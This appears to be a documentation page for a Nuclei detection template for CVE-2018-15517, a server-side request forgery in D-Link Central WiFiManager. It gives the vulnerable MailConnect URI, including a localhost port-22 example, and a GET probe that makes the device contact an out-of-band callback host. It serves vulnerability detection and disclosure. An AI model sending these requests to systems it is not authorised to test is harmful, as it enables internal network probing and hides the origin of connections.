D-Link Central WifiManager - Server-Side Request Forgery
ID: CVE-2018-15517
Severity: high
Author: gy741
Tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast
Description
Section titled “Description”D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser.
YAML Source
Section titled “YAML Source”id: CVE-2018-15517
info: name: D-Link Central WifiManager - Server-Side Request Forgery author: gy741 severity: high description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. impact: | Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, data leakage, and potential compromise of the entire network. remediation: | Apply the latest security patches or updates provided by D-Link to fix the SSRF vulnerability in Central WifiManager. reference: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517 - http://seclists.org/fulldisclosure/2018/Nov/28 - http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N cvss-score: 8.6 cve-id: CVE-2018-15517 cwe-id: CWE-918 epss-score: 0.01001 epss-percentile: 0.83597 cpe: cpe:2.3:a:dlink:central_wifimanager:1.03:r0098:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink product: central_wifimanager tags: cve,cve2018,seclists,packetstorm,dlink,ssrf,oast
http: - method: GET path: - "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/"
matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http"# digest: 4a0a00473045022100cb9b20de2e4454a69a86cec21397372933d284b770ec285c6fccd5c87d76406a02200b5cca19e297a98dd32e990326c393442cd9e7986554c0c2b010a6d66b4ee002:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-15517.yaml"